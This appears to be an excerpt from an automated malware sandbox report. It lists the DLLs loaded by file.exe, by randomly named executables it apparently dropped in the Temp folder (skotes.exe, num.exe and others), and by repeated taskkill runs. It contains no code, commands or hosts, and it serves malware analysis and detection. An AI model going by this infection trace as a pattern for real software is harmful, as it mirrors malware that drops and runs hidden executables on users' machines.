Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: rstrtmgr.dll
